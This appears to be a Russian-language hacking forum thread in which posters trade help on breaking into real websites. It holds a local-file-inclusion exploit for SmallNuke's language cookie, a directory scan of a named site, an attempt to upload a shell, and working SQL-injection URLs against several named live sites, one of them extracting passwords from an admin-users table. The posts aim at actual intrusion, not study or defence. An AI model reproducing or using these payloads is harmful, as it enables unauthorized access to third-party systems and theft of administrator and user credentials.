Нашел LFI в SmallNuke common.php PHP: if ((!isset ($_SESSION['snss_lang'])) AND (isset($_COOKIE['snss_lang']))) { session_register ("snss_lang"); $_SESSION['snss_lang'] = $conf['default_lang']; if ($_COOKIE['snss_lang'] != "") { $_SESSION['snss_lang'] = $_COOKIE['snss_lang']; } else { $_SESSION['snss_lang'] = $conf['default_lang']; } } define ('_SNSS_LANG',''.$_SESSION['snss_lang'].''); index.php PHP: include (SN_PathRoot.'inc/common.php'); if (file_exists (SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php')) { include_once (SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php'); } else { eror ("Eror! Lang file is absent"); exit; } У себя тестировал, например, куки snss_lang = /../../robots.txt%00 отлично инключится. Пробую на реальном сайте (http://www.bifilife.ru/index.php) ru.php%00 и en.php%00 работают, а вот за пределы lang никак не получается вылезти. Что именно не так делаю?) (пробовал на нескольких)
помогите подобрать таблицы не как не могу найти даже с помощью SQLIHelperV.2.7 не чего не находит( версия 4.1.22-standard сразу скажу что это шоп. пробовал подбирать в ручную но тчетно. могу в пм кинуть линк кто сможет мне объеснить!
http://aaptnet.org/.htaccess 403 Forbidden http://aaptnet.org/.htconfig 403 Forbidden http://aaptnet.org/.htpasswd 403 Forbidden http://aaptnet.org/education 301 Moved Permanently http://aaptnet.org/cgi.cgi 403 Forbidden http://aaptnet.org/cms 301 Moved Permanently http://aaptnet.org/css 301 Moved Permanently http://aaptnet.org/favicon.ico HTTP 200 OK http://aaptnet.org/img 301 Moved Permanently http://aaptnet.org/index.php 302 Found http://aaptnet.org/index.py 403 Forbidden http://aaptnet.org/login.php 401 Internal Server Error http://aaptnet.org/manager 301 Moved Permanently http://aaptnet.org/news 301 Moved Permanently http://aaptnet.org/picture_library 301 Moved Permanently http://aaptnet.org/quikstore.cgi 403 Forbidden http://aaptnet.org/resources 301 Moved Permanently http://aaptnet.org/test 301 Moved Permanently http://aaptnet.org/web_store.cgi 403 Forbidden http://aaptnet.org/home 301 Moved Permanently http://aaptnet.org/members 301 Moved Permanently http://aaptnet.org/server-status 403 Forbidden http://aaptnet.org/.htaccess~ 403 Forbidden http://aaptnet.org/.htpasswd~ 403 Forbidden
пробую залить шелл http://www.pogoda.ua/index.php?id=-4+union+select+1,file_priv,3,4,5+from+mysql.user-- ничего не получается, есть поле users c test;test, http://www.pogoda.ua/admin тож ничего не происходит...есть вообще какие варианты попасть в админку или залить шелл?)
хитромудрая скуль и походу тут не mysql http://www.collegedates.com/selectschool/?section=signup&schoolid=731+and+1=1&sid= помогите с советом
Обычная скуля, 4 колонки, без вывода http://www.collegedates.com/selectschool/?section=signup&schoolid=731+union+select+111,222,333,444+--+&sid=
http://www.collegedates.com/selectschool/?section=signup&schoolid=731+union+select+1,2,3,4--+ Как бы там blind
Делаем несколько магических движений, а потом "ТУПО" заламываемся в админку без пароля http://www.collegedates.com/admin/
http://www.collegedates.com/selectschool/?section=signup&schoolid=99999+union+select+1,2,table_name,4+from+information_schema.tables+limit+15,1-- где тут blind емае
посоветуйте как вывести данные по следующим колонкам id, name, password _http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+column_name,2+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=0x41444D494E5553455253+limit+0,4--
http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+password,2+from+442393_oasisoftheseas_data.adminUsers